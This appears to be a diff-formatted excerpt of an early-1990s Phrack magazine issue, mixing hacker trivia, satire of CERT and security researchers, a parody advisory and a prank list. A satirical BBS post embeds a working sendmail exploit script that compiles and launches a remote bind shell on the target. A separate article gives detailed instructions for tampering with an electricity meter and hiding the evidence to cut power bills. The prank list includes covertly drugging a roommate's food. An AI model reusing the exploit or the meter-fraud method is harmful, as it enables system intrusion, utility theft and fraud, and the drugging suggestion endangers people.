+        Jeff
+
+87)     What company's games was David Lightman after?
+        Protovision
+
+88)     26.0.0.0
+        NET-MILNET
+
+89)     Who was Mr. Slippery forced to locate?
+        The Mailman
+
+90)     Who is "The Whistler?"
+        Joe Engressia
+
+91)     What use would a 6.5536 crystal be?
+        Making a red box
+
+92)     .--.  ....  .-.   .-  -.-.  -.-
+        PHRACK
+
+93)     The Dark Avenger likes what group?
+        Iron Maiden
+
+94)     What book spawned the term "worm?"
+        The Shockwave Rider
+
+95)     Michael in "Prime Risk" wanted money for what?
+        Flying Lessons
+
+96)     Automan's programmer worked for who?
+        The Police Department
+
+97)     What signal filled in keystrokes on TOPS-20?
+        ESC
+
+98)     ITS
+        Incompatible Time-sharing System
+
+99)     (a/c)+121
+        Inward Operator
+
+100)    What drug kept the scanners sane?
+        Ephemerol
+
+Bonus 1
+3 pts   Name three bodies of work by Andrew Blake?
+        Night Trips
+        Night Trips 2
+        Hidden Obsessions
+        Secrets
+        (etc.)
+
+Bonus 2
+3 pts   Name three currently available titles with Norma Kuzma.
+        Fast Food
+        Not of This Earth
+        Cry Baby
+        Laser Moon
+        (etc.)
+
+Bonus 3
+4 pts   Why would I hate Angel Broadhurst?
+        Because he was living with Christina Applegate.  (Duh)
+
+*******************************************************************************
+
+               **  PHRACK MAGAZINE NEEDS THE FOLLOWING **
+
+    Any Storage Device Capable of Writing ISO-9660 Format + Software
+      (IE: Personal ROM-Writer, Pinnacle Optical Drive, MicroBoard)
+
+                    A Flatbed 24-Bit Color Scanner
+
+                            SCSI Hard Drives
+
+                      486 or Pentium Processors
+
+        SGI Indy/Indigo/Crimson/Iris/Challenge II/Onyx  (Any would do)
+
+                     Spectrum Analysis Equipment
+
+                              Oscilloscopes
+
+            Horizontal & Vertical Sync Adjustment Equipment
+
+                    Miscellaneous Ham Radio Equipment
+
+     Any donations will be generously rewarded with k-rad info and
+                        huge amounts of good karma.
+
+** PHRACK MAGAZINE DOESN'T REALLY NEED BUT KINDA WOULD LIKE THE FOLLOWING **
+
+               The Drew Barrymore Home Video (The Motel One)
+
+           The Christina Applegate "Home Video"  (The Poker One)
+
+                           Xuxa's "Early" Films
+
+                  Howard Stern's "Banned by the FCC" CD
+
+                      Jennie Garth's Workout Tape
+
+              The European Smut Mag with Alissa Milano in it.
+
+*******************************************************************************
+
+
+[Something very humorous I found on the FireWalls List]
+
+A one-act play
+
+Dramatis Personae:
+ Perry Metzger (PM): an AVP responsible for the firewall at a
+                            Fortune 100 company.
+        Joe Cert (JC): A person at CERT supposed to be helping.
+
+[The scene opens to Perry on the phone with Joe Cert. Perry is at work
+and freaking out because he doesn't run Sun sendmail and doesn't know
+what to do. If he turns off mail, his users will kill him. He has no
+idea how many machines he has to fix or if he has a problem at all.]
+
+PM: Well, I have the problem that I don't normally run Sun sendmail,
+and I can't run it, so I need to know enough that I can figure out how
+to fix my security problem.
+
+JC: Well, we don't have a procedure to tell people anything beyond
+what we put in the advisory.
+
+PM: I run the gateway for a firm that trades hundreds of billions of
+dollars a day in the financial markets. We can't afford do get shut
+down. Isn't there any way you can tell me anything that can help me?
+
+JC: Well, we really don't have a procedure in place.
+
+PM: I see. Can I ask you some questions?
+
+JC: Sure.
+
+PM: So this problem, would it be fixed if I had the Prog mailer turned
+off on my machines?
+
+JC: Well, its a problem that will allow people to run programs on your
+machine.
+
+PM: Yes, but would turning off the Prog mailer fix it?
+
+JC: Well, the problem allows people to run programs on your machine.
+
+PM: I see. Will this problem only hurt machines that have direct TCP
+access to the internet, or are machines that can get mail indirectly
+also possibly affected?
+
+JC: The hole is exploited by sending mail to the machine.
+
+PM: Yes, but do you need SMTP access to the machine, or will just
+being able to send mail to it hurt you?
+
+JC: Well, the hole is exploited by sending mail to the machine.
+
+PM: look, the machine on my firewall can't be telneted to. Does that
+make me safe?
+
+JC: Well, the hole is exploited by sending mail to the machine.
+
+PM: Listen, I have THREE THOUSAND workstations in a dozen cities on
+three continents. Are you telling me that I have to tell all my people
+that they are working the weekend installing a new sendmail on every
+machine in the firm? I don't even know how to test to see if I've
+fixed the problem once I've done that!
+
+JC: Well, the whole is exploited by sending mail to the machine.
+
+PM: Can't you tell me any details?
+
+JC: We really don't have a procedure for that.
+
+PM: Do you know what the problem is?
+
+JC: I can reproduce it, yes.
+
+PM: Look, I work for a company with REAL MONEY on the line here. I can
+get you a letter from a managing director telling you that I'm legit.
+You can check who we are in any newspaper -- we're one of the largest
+investment banks in the world. Every day the Wall Street Journal lists
+the Lehman Brothers T-Bond Index on page C-1. You can check my
+criminal record -- hell, the SEC makes you get fingerprinted so many
+times around here that I've still got ink on my fingers from the last
+time. Can't you give me some help here?
+
+JC: We really don't have a procedure for doing that. I'm taking
+notes, though, and I'll tell my management of your concerns.
+
+[He continues in this vein, but eventually, our hero gives up,
+realizing that CERT is part of the problem, not the solution. All
+they've succeeded in doing is keeping him up at night. He can't fix
+his problem, since he doesn't know how. He has no idea if he has a
+problem. He can't check once he's done something to determine if he's
+fixed it. All he knows is that CERT has no procedure for telling him
+anything regardless of who he is, period.]
+
+PM: So what you are telling me is that if I want details I have to
+subscribe to 2600 Magazine?
+
+JC: We don't have a procedure for giving you more information, no.
+
+PM: I'm sure the crackers will be happy to hear that. They are likely
+telling each other at a nice high speed.
+
+*******************************************************************************
+
+                    IF SECURITY TYPES WERE K-RAD
+                               PART II
+
+
+SecurNet BBS Captures
+(From the LODCOM BBS Archive Project)
+------------------------------------------------------------------------------
+
+Number  :) 214
+From    :) Uncertain Future
+Subject :) Get a life
+
+Hey All,
+
+Everyone out there who keeps calling up the Hotline
+begging for BUGS can just get a life.
+
+If you have to ask, you don't deserve to know.
+
+UnCERTian Future
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 215
+From    :) Spaf Master
+Subject :) ...
+
+Rum0r haz 1t that a p13cE 0f sH1t hAqu3r
+Nam3d Sk0tt ChaZ1n iz 0n Th3 F1RST l1zt!*&@$
+
+3yE hAv3 Try3D 2 g3t h1m Rem0v3D ButT n0-1
+0N th3 l1sT w1lL d3w 1t!!
+
+Y Kan'T w3 d0 s0meth1ng aB0uT tHeze pr1ckz?
+
+1 r3MeMb3r a dAy Wh3n 1t 0nLy t0oK a PhAx
+thR3at3n1nG 2 3nD mY sUpP0rT w0ulD g3t
+a CumSek Haqu3r lyK3 ChaZ1n R3m0v3D!@!#
+
+Sh1T!
+
+--spaf
+Forum Of OverLordS
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 216
+From    :) Zen
+Subject :) Who died and left you in charge?
+
+You suck Jeanie.
+
+Who said YOU got to be the master?
+Your group sucks too.  You have obsolete info.
+You guys say "There is nothing you have that we can
+not possess?"  Well, there is nothing you have that
+WE want to possess.
+
+I think I will begin shooting off my mouth at
+Usenix Security BOFs and in Risks and in
+mailing lists, then maybe I can be as ELEET as
+you.  NOT!
+
+Zen
+Legion of Security Types
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 217
+From    :) Hackman
+Subject :) I Dream of Geneie
+
+Yo Yo Yo...
+
+I think someone wants to be the next Donn Parker.
+Similarities:
+
+1)  Has BIG mouth
+2)  Writes Worthless Books
+3)  Hoardes inpho from invisible enemy
+4)  Goes on and on about "Evil Crackers"
+
+You should start charging 5000+ dollar speaking fees
+and shave your head.  THEN, maybe someone will
+hire your worthless self, and you can emerge
+from Academia into the REAL world.  Nah...you are
+too LAME!
+
+HACKMAN
+Legion of Security Types
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 218
+From    :) American Eagle
+Subject :) hey.
+
+You two punks think you are so kool, don't you?
+I was developing security theory when you were
+in junior high.  You need to get your asses
+kicked, and I'm the guy to do it.
+
+About my speaking fees...Youre jealous.  See green often?
+You wish your k-rad companies (pffft) would pay you
+as well.  BAH.
+
+AE
+ /q
+.
+\s
+
+
+end/
+stop
+,
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 219
+From    :) Captian VAX
+Subject :) New BBS
+
+Hello,
+
+I am putting up a new bbs to be a forum for a database
+on bugs and security problems.  If you are interested,
+please send me email on here or on internet.
+
+Thx
+
+CV
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 220
+From    :) The BeanCounter
+Subject :) STUPH
+
+HEY...I AM NOT SURE BUT I THINK
+MY ACCOUNT AT DOCKMASTER HAS BEEN
+HACKED OUT.  IF ANY1 KNOWS WHO
+DID IT LET ME KNOW.
+
+I AM REALLY PISSED!  THATS WHAT
+HAPPENS WHEN PEOPLE GET SLOPPY AND
+THEY LET ON JUST ANYONE WHO CAN
+FILL OUT THE FORM!  CAN WE LIE DOWN
+WITH DOGS AND EXPECT NOT TO GET UP
+WITH FLEAS?
+
+WHM
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 221
+From    :) Spaf Master
+Subject :) fUq U alL
+
+33t sh1T u Pr1Kz!#!$@
+
+3yE m M0r3 3l33t thAn alL 0f u!!!
+
+U w1lL All F3el mY wRatH!
+
+Ey3 Hav3 ur InPh0!@$@  1 w1Ll b3 kaLl1nG 3aCh
+0f U v3Ry so()n.
+
+--spaf
+Forum Of OverLordS
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 222
+From    :) Venom
+Subject :) Fuck!
+
+Now I'm mad.  That bastard Chasin posted the Sendmail Bug on
+The firewalls list!  Now all the hackers will have it!
+
+I'm going to take him down. Anyone who wants to help, his
+site is crimelab.com.  You can check the Forum's
+Codeline for further developments.
+
+Get your scripts ready!  Let's hack the little prick!
+
+Venom
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 223
+From    :) American Eagle
+Subject :) Sendmail
+
+What is the sendmail bug?
+
+AE
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 224
+From    :) Uncertian Future
+Subject :) Sendmail
+
+The Sendmail bug is a bug that works using sendmail.
+
+This bug works on hosts using sendmail and can allow
+people to do things from remote through sendmail.
+
+I know the bug, but I'm not going to give it out.
+
+Forum Members can get it from the Database
+on CertNet.
+
+UnCERTian Future
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 225
+From    :) The BeanCounter
+Subject :) SENDMAIL
+
+ED:
+
+I DON'T HAVE ACCESS TO THE DATABASE
+ON CERTNET.
+
+COULD YOU SEND IT TO ME IN EMAIL?
+
+WHM
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 226
+From    :) Uncertian Future
+Subject :) Bill...
+
+Yes, you do.  All Members of The Forum
+have access.  I will call you and tell you
+how to access it.  Remember, UNIX
+is case sensitive.  If this is a problem, you
+will have to use another computer.
+
+UnCERTian Future
+Forum Of OverLordS
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 227
+From    :) Information Warrior
+Subject :) InterNuts
+
+I have been having a really dumb conversation on the
+net with a moron who wants to argue about HERF with ME!
+WITH ME!  Can you believe it?  I almost want to strangle the
+guy.  Some college kid, but still...
+
+The new file is due out soon.  I will place it in the
+upload section in .zip format.  Someone will have to
+unzip it for Donn and Bill.  I don't think they have
+figured that utility out yet.
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 228
+From    :) Hackman
+Subject :) Sendmail Bug.  Dig it.
+
+You Forum people piss me off.  Turn on your buffers everyone
+cuz here comes the bug.  Fuck you if you don't like it.
+
+
+------Cut Here--------
+#!/bin/sh
+# Copyright, 1992, 1993 by Scott Chasin (chasin@crimelab.com)
+#
+# This material is copyrighted by Scott Chasin, 1992, 1993. The
+# usual standard disclaimer applies, especially the fact that the
+# author is not liable for any damages caused by direct or indirect
+# use of the information or functionality provided by this program.
+#
+# Description:
+#
+# Exploit NEW sendmail hole  and bind a port so we can spawn a program.
+# Not for distribution under any circumstances
+#
+# Usage: smail <hostname> <target-user-name> <target-port> <shell command>
+# default: smail <localhost> <daemon> <7001> </bin/sh>
+
+port=$3
+user=$2
+cmd=$4
+
+if [ -z "$2" ]; then
+   user=daemon
+fi
+
+if [ -z "$3" ]; then
+   port=7002
+fi
+
+if [ -z "$4" ]; then
+   cmd="/bin/csh -i"
+fi
+
+(
+sleep 4
+echo "helo"
+echo "mail from: |"
+echo "rcpt to: bounce"
+echo "data"
+echo "."
+sleep 3
+echo "mail from: $user"
+echo "rcpt to: | sed '1,/^$/d' | sh"
+echo "data"
+echo "cat > /tmp/a.c <<EOF"
+cat <<  EOF
+#include <sys/types.h>
+#include <sys/signal.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netdb.h>
+reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
+int **av;{struct sockaddr_in mya;struct servent *sp
+;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
+signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
+0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
+sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
+==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
+=htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
+(struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
+1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
+(select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
+loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
+==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
+NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
+(0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
+goto loop;}
+EOF
+echo "EOF"
+echo "cd /tmp"
+echo "/bin/cc /tmp/a.c"
+echo "/bin/rm a.c"
+echo "/tmp/a.out $port $cmd"
+echo "."
+echo "quit"
+) | mconnect $1
+---------------------------------------------------------------------
+
+
+This Buffer Brought To You By:  L.O.S.T
+
+Greets Going Out To: The Great Circle, Apple-Man, Casper The Ghost,
+                     Zen and the L.O.S.T Posse!
+
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 229
+From    :) Spaf Master
+Subject :) D1CK!!!
+
+Ey3 kAnt b3l1V3 u p0sT3d 1t!
+
+U w1lL PaY d3aRly 4 ur NaRq1nG th1z BUG!
+Ur dAyz r NumB3rd!@!#
+
+--spaf
+Forum Of OverLordS
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 230
+From    :) LOST Girl
+Subject :) Bugs
+
+Thanks for posting that.  I was wondering if you
+I would ever get it.  Nasa probably has it...they
+have every HOLE...  <sigh>  Why did I take this job?
+
+L.O.S.T Girl
+
+Number  :) 231
+From    :) American Eagle
+Subject :) That post
+
+How do you use that bug?
+
+I tried typing it in,but got a lot of errors.
+
+Is it for some special operating system?  Or do you have
+to type it in on a special port?
+
+American Eagle
+Forum Of OverLordS
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 232
+From    :) Zen
+Subject :) New Program
+
+The new version of COPS is available for Download.
+Zero Day Ware!  Get it fast.  I will u/l updates/
+bug fixes later...
+
+Gotta love all them filepoints!
+
+Off to play Xtank
+
+Zen
+Legion Of Security Types
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+Number  :) 234
+From    :) Spaf Master
+Subject :) !@!#
+
+Ur Pr0grA/\/\ 1z amUz1nG, But Un3l3eT
+
+Eye p0Ss3z 1 0F mUch gR3aTr aB1liTy thAt Th3
+4-m w1lL Us3.
+
+Ch3Ck th3 DatAbaS3 0n CERT-NET.
+
+D3aTh 2 LOST
+
+--spaf
+Forum Of OverLordS
+
+Number  :) 235
+From    :) Sysop
+Subject :) WARNING!
+
+Someone has given out the NUP.
+Some cracker type has attempted to
+access the bbs as of last night.  I will call
+UnCERTain Future to put out an advisory on this
+issue.  Please do not give out the NUP to anyone.
+
+THIS IS A PRIVATE BBS!
+
+[A]uto reply [N] [R]e-read [Q]uit:N
+
+End of Messages
+
+[A]uto reply [N] [R]e-read [Q]uit:Q
+
+*******************************************************************************
+
+=============================================================================
+CA-93:16                         CERT Advisory
+                               October 23, 1993
+                         Hacker/Cracker Vulnerabilities
+-----------------------------------------------------------------------------
+
+The CERT Coordination Center has learned of several vulnerabilities
+in the language used on the USENET system.  This vulnerability affects
+all users running rn, tin or other USENET news readers as well as users
+holding discussions containing the words "hacker" or "cracker".
+
+Patches can be obtained from your local phrack archive as well as through
+anonymous FTP to they ftp.netsys.com (192.215.1.2) system.
+
+Information concerning specific patches is outlined below. Please note
+that phrack sometimes updates patch files.  If you find that the checksum
+is different, please contact phrack.
+
+-----------------------------------------------------------------------------
+
+I.   Hack and Crack Vulnerabilities
+
+     These vulnerabilities affect all systems running a USENET news-
+     reader including rn and tin, as well as all conversations, papers
+     and stories involving the words "Cracker" and/or "Hacker".
+
+     ** This vulnerability is being actively exploited and we strongly
+        recommend that sites take immediate and corrective action. **
+
+     A. Description
+
+        A vulnerability exists in the words "Hacker" and "Cracker" such
+        that users may become confused as to exactly who/what you are
+        talking about when used in a sentence.
+
+     B. Impact
+
+        Unauthorized confusion to affected conversations may ensue.
+
+     C. Solution
+
+        We recommend that all affected sites take the following steps
+        to secure their systems.
+
+        1.  Obtain and install the appropriate patch following the
+            instructions included with the patch.
+
+          System       Patch ID   Filename         Checksum
+          ------       --------   ---------------  ---------
+           all          10288      10288.tar.Z      5551 212
+
+        The checksums shown above are from the BSD-based checksum.
+
+        2.  If your conversation is found to have been compromised by
+            the word "Hacker" or "Cracker", we recommend you flame
+            all parties involved and immediately break up the discussion
+            by talking about the "correct" meaning of the words.
+
+        3.  Depending upon the sensitivity of the information contained
+            in your conversation, you may wish to replace the existing
+            conversation with one discussing (a) the NSA,  (b) the BATF
+            (c) The Kennedy Assasination, (d) why shadowing password
+            schemes are helpful or hurtful or (e) which file editor is
+            actually the best.
+
+
+---------------------------------------------------------------------------
+The CERT Coordination Center wishes to thank the Rogue Agent, (Rogue Agent/
+SoD!/TOS/KoX), the letter 'Q' and the number '55' for reporting these
+vulnerabilities and Phrack, Inc. for their response to these problems.
+---------------------------------------------------------------------------
+
+If you believe that your system has been compromised, contact the CERT
+Coordination Center or your representative in FIRST (Forum of Incident
+Response and Security Teams).
+
+Internet E-mail: cert@cert.org
+Telephone: 412-268-7090 (24-hour hotline)
+           CERT personnel answer 8:30 a.m.-5:00 p.m. EST(GMT-5)/EDT(GMT-4),
+           and are on call for emergencies during other hours.
+
+CERT Coordination Center
+Software Engineering Institute
+Carnegie Mellon University
+Pittsburgh, PA 15213-3890
+
+Past advisories, information about FIRST representatives, and other
+information related to computer security are available for anonymous FTP
+from cert.org (192.88.209.5).
+
+*******************************************************************************
+
+[** NOTE:  The following file is presented for informational and
+           entertainment purposes only.  Phrack Magazine takes NO
+           responsibility for anyone who attempts the actions
+           described within. **]
+
+Power to the People
+
+ A little theory to get you started:
+
+Watts=Current * Voltage
+
+    A power meter consists of a voltage coil, a current coil, a small motor
+to drive the dials, and little else.  Given the formula above, if we can
+somehow cut down the voltage that the meter 'sees', then we can reduce the
+number of watts that it measures.  If we cut our voltage in 1/2, our watts
+also get cut in half.
+
+    Fortunately, your meter doesn't read the voltage directly off of the
+lines into your house.  Two small wires lead to the voltage coil within the
+meter.  Simple modification to this circuit is all that is needed.  Inserting
+a resistor in series with the voltage coil will cut the voltage that the
+meter sees, and therefore that wattage that it reads.
+
+    Meters read Kilowatts per hour, and you pay so much for each kilowatt.
+Since the hours remain constant (unless your stuck in one of those nasty
+little dimensional time warps..and I really hate it when that happens), your
+bill is directly related to what resistor value you insert.  Do this
+correctly, and carefully, you will save a bundle on the power you use.
+
+    Say I cut my bill by $40 per month..$40 * 12 months = $480 saved with
+a original 'investment' of $5 that is a 96 fold return on your investment.
+This idea also might be used to provide a service to your trusted friends,
+$100 bux a mod or so..$$$
+
+    One last little caution before you begin, don't go messing around with
+the adjustment screws you will find, usually there are 2 of them with F & S
+marked near them.  I had the foolish idea to mess with these, the result is
+when I am drawing very little power (a few watts) my meter will slowly run
+backwards.  Next time I'm modifying it, I'll have to fix that.  Mr. Meter
+Reader would really wonder what the heck was going on when he saw that.
+(Mr. Meter Reader will be thinking he's done far to many drugs on the
+weekend..or needs to be.)
+
+SUPPLIES NEEDED:
+
+    (2) Power meters.  You'll perform the mod on one, and use the other to
+        have in while you're doing it.
+    (1) Length of heat shrink tubing, a sufficient size to cover a half
+        watt resistor.
+    (Some) half-watt resistors, 10k-25k or so.  (A 10K resistor will cut
+           your bill in half...15K quit a bit more (the amount saved, is
+           NOT linear to the resistor value..more like a logarithmic scale)
+ (some) Good old 100% silicon caulk
+    Soldering iron, solder, lots of nerve.
+
+To begin the Mod:
+
+    Take the little 'lock' they use (little plastic deal), and chuck it.  Wait
+about 2 months for the reader to get used to the fact it's gone..the idea
+is that if they think you've tampered with it cause the lock is gone..they
+will check and find no tampering then..(least that's the idea)
+
+    If you happen to know someone who works for the power company, and can
+get your hands on some of those locks, get a few new ones, and let them 'age'
+outside for a few months (to get that used look), then replace yours with it
+when done.  And if anyone happens to know of a source for these locks, I
+would appreciate knowing.
+
+    You'll need to 'find/get/steal/snag/etc' another meter to put in while your
+fixing your..(kinda hard to see/solder with no power) ;)
+
+    Lift the now unlocked cover and pull meter out..(simply pulls out of the
+socket real easy) put other meter in for a while..(do at night would be a good
+idea..neighbors would wonder what the heck you were doing eh?)
+
+    On the side of the meter, there will be a little (probably copper), pin,
+that is designed to break when you unbend the end of it..(security device).
+Be real careful and try not to break it when you bend it back (if it breaks,
+save the piece that broke off)
+
+    Pull that out, and then turn the ring that holds the unit together..it
+should then come apart real easy.
+
+    Between the assembly where the wheel is and the base plate, look in the gap,
+there should be a black deal that looks like a transformer attached to the core
+of the meter and 2 black wires leading from the prongs of the meter base to
+the smaller coil.  This is the voltage coil.  Here comes the fun part!
+
+    Cut one of the wires, being sure you cut where you can hide the damage
+later.  Solder in 10k or 15k resistor with the leads of resistor cut off right
+at resistor body, and also put the heat shrink tubing on the resistor, and
+shrink it..(with heat preferably) ;)
+
+    Take silicone rubber (the 100% pure stuff..) and glue the resistor and the
+shrunk tubing over it underneath the top assembly.  Make it appear that the
+wires simply curve up that way and nothing more.  Put ring back on.  Notice
+that you must put the meter together exactly the way it came apart.
+Example:  on mine, i noticed that there was dirt on the bottom from rain
+splashing mud onto the meter.  It would look kinda obvious if the mud
+suddenly appeared on top of the meter.
+
+    Take the little pin that you removed (copper thing) and replace it in
+the hole and through the ring as before. Bend the end back up like before
+also if it broke, bend what is left anyways, there should be plenty left
+to bend.  Take the broken end (if it broke), and jam it under the end of
+the bend to make it look legit.  If they do pull the meter to inspect,
+they will hopefully just think that it might have broke loose when it was
+installed.
+
+    I have noticed on some unmodified meters that I 'found' that the security
+pin has been broken already.  So It's reasonable safe to assume that they
+don't take much faith in them.
+
+    When done, you should NOT be able to tell if any mods have been done by
+looking.  Be sure it's undetectable, they get kinda mad when you do things
+like this for some odd reason.  It's suggested that after the modification,
+you have a friend, who you trust not to fink, take a very close look to
+see if they can spot any mods.
+
+    Your bill should drop in half or more..if you really want to drop the
+bill..do this in steps.. a few months apart..so they won't notice that your
+bill is dropping like a rock.  Just don't get silly.  Using only 1kwh per
+month just yells fraud.  Mine went from $80-$90 a month to around $30-$37
+month with a 10K resistor (I added a electric dryer and other items during
+that month also.)
+
+    You might want to try this a few times on other meters you've 'found'
+just to get the nack of it first, it should work with all meters.  At least
+the ones they use in my area.
+
+Table of comparisons:
+
+test made using 1320 watt electric heater.
+120V
+11 amps
+1.3 KWH
+
+resistor value              rev per time        voltage cross resistor rev/hour
+------------------------------------------------------------------------------
+0                           1 rev/23 seconds     0                     156
+1k                          1 rev/24 seconds     9.                    150
+10K                         1 rev/42 seconds    63                      85
+12k                         1 rev/53 seconds                            68
+39K                         1 rev/464 seconds   ???                      7.25
+
+
+
+    Notice the 39K resistor's performance, NOT a good choice to use, it
+will cut your bill to 4% of the original.  They will wonder about this.
+I'm currently using 10K which will cut it to approx 54% of the original bill.
+My bill is around 1/2 previous. Saving me approx $30-$50 a month in power
+bills.  Not bad for a 10 cent resistor.
+
+    Keep in mine the wattage rating of the resistor.  Measure the voltage
+across the resistor.  Take that number divide it by the resistor your using
+to get current.  Take the current times current (square it), and multiply
+this by resistance value to get the wattage of resistor that is required.
+After all, it would not be a good thing for the resistor to go up in smoke.
+Mr. Meter Reader would wonder why you used 0 kwh this month.
+
+    There also is another method that in theory will make your power bill less,
+this is called 'power factor correction', but unfortunately requires the use
+of some rather large (read expensive) AC cap's.  For this reason (and the fact
+it cost under $5 and provides more of a benefit), the method of using the
+resistor is more useful and do-able by the everyone (especially those
+who despise the 'system').
+
+
+Notice that I have NOT left a email address or the like for correspondence,
+namely due to the fact that this is highly illegal and greatly frowned upon
+by the authorities.  If anyone has a need to contact me they may do so via
+phrack magazine, they can forward mail to me.  If you do this modification
+correctly and per instructions, you will indeed save money.  Have fun,
+be careful, and challenge the system at every turn.
+
+*******************************************************************************
+
+
+  DATA BANK OF THE GERMAN SPEAKING AN-ARCHISM
+      The Da.d.A. Project
+         DAtenbank des Deutschsprachigen Anarchismus
+
+Berlin, Koln
+
+    The history of the liberative movement has not yet been filed sufficiently.
+That is, mainly, due to the lack of scientists with interest in exploring this
+area.  Thanks to that, people who need bibliographic information for some
+specific themes of the history of anarchism, must go through all direct sources
+and derive from those some conclusions.  Things are more difficult in case
+modern literature is required, for the theory and practice of liberative
+movements, which have appeared in the meantime.
+
+    The data bank of the German speaking anarchism (DAtenbank des
+Deutschsprachigen Anarchismus) is trying to cover the lack of bibliographic
+material.  Currently it files anarchistic or, generally, liberative documents
+and publishes.  Later it will comprehend documents which deal with the history
+and theory of those movements.
+
+    We are focusing our compilation activities, to the German speaking areas
+with plans of enhancing that shortly.  In parallel we are elaborating
+an introduction to the publishing history of the printed material, which will
+be informative for their political and editorial meanings.
+
+    From the early 1980's, the filing of the German liberative press is open
+for exploration.  It covers the chronological period from the philosophic
+commencements of the German anarchism, in the 1832, until nowadays.  Strength
+of expression is given to newspapers and magazines, though collections of
+documents, almanacs, year-books, congresses' protocols and catalogs are
+not omitted.
+
+    Except of the anarchistic publishes we are also registering material whose
+cooperatives or publishers were anarchists.  The filing is achieved using all
+the usual bibliographical criterion (titles, publishers, date/district,
+circulation, place of distribution et cetera).
+
+    In order to handle the increasing demands of the people who would like to
+access our material, we decided to publish our first synthetic registers in a
+series of brochures.  This publication, in restricted copies and four or five
+continuations, will be available at the "File of Social and Civilization
+History" of the 'Libertad' publications in Berlin.  The first brochure, is
+occupied with the German liberative press from 1832 to 1890.  Every copy of
+this serial includes a diagram of the press' history, chronological
+bibliography of the magazines and an index.
+
+    We resume special researches through the data bank and we offer the results
+printed.  Until now we have filed over 1000 titles, which offer many different
+elements for research each.
+
+    Da.d.A. is a private, research project.  We do not accept donations from
+state institutions and other similar organizations.  In that way we can
+continue our efforts undistracted and independent.  The disadvantage is
+that we support Da.d.A. with personal expenses and when we have free time
+available.
+
+    The modern liberative press is difficult to register and get filed.
+Although liberative publications were developed in an unprecedented way
+(and not only arithmetically) after 1968, few publications are accessible
+from libraries and files.  Especially today we must tune up our practises
+in order to protect modern press.  We encourage every publisher of anarchistic
+material, even if productions are ceased nowadays, to send us information and,
+if possible, a copy of their publications.  They will get registered in our
+computer and filed in the library for the Research of Social Demands, in
+order to be accessible for studies in the future.
+
+    For more information about the Da.d.A. project and the possibilities of
+using the data bank, you can contact us in the following addresses:
+
+ BERLINER GESELLSCHAFT ZUM STUDIUM SOZIALER FRAGEN e.V.
+    Projekt: Datenbank des Deutschsprachigen Anarchismus (Da.d.A.)
+
+ c/o Jochen Schmuck  c/o Gunter Hoering
+ Postfach 440 349  Pfalzer Str.27
+ 1000 BERLIN 44   5000 KOLN 1
+ Tel. 030/686 65 24  Tel. 0221/21 81 49
+
+*******************************************************************************
+
+[Don't ask me why I'm printing this.  I just think it's funny as hell.]
+
+100 WAYS TO FREAK OUT YOUR ROOMMATE
+
+1.   Smoke jimson weed.  Do whatever comes naturally.
+
+2.   Switch the sheets on your beds while s/he is at class.
+
+3.   Twitch a lot.
+
+4.   Pretend to talk while pretending to be asleep.
+
+5.   Steal a fishtank.  Fill it with beer and dump sardines in it.  Talk to
+     them.
+
+6.   Become a subgenius.
+
+7.   Inject his/her twinkies with a mixture of Dexatrim and MSG.
+
+8.   Learn to levitate.  While your roommate is looking away, float up out of
+     your seat.  When s/he turns to look, fall back down and grin.
+
+9.   Speak in tongues.
+
+10.  Move you roommate's personal effects around.  Start out subtle.
+     Gradually work up to big things, and eventually glue everything s/he
+     owns to the ceiling.
+
+11.  Walk and talk backwards.
+
+12.  Spend all your money on Jolt Cola.  Drink it all.  Stack the cans in
+     the middle of your room.  Number them.
+
+13.  Spend all your money on Transformers.  Play with them at night.  If
+     your roommate says anything, tell him/her with a straight face, "They're
+     more than meets the eye."
+
+14.  Recite entire movie scripts (e.g. "The Road Warrior," "Repo Man,"
+     Casablanca,") almost inaudibly.
+
+15.  Kill roaches with a monkey wrench while playing Wagnerian arias on a
+     kazoo.  If your roommate complains, explain that it is for your
+     performance art class (or hit him/her with the wrench).
+
+16.  Collect all your urine in a small jug.
+
+17.  Chain yourself to your roommate's bed.  Get him/her to bring you food.
+
+18.  Get a computer.  Leave it on when you are not using it.  Turn it off
+     when you are.
+
+19.  Ask your roommate if your family can move in "just for a couple of
+     weeks."
+
+20.  Buy as many back issues of Field and Stream as you can.  Pretend to
+     masturbate while reading them.
+
+21.  Fake a heart attack.  When your roommate gets the paramedics to come,
+     pretend nothing happened.
+
+22.  Eat glass.
+
+23.  Smoke ballpoint pens.
+
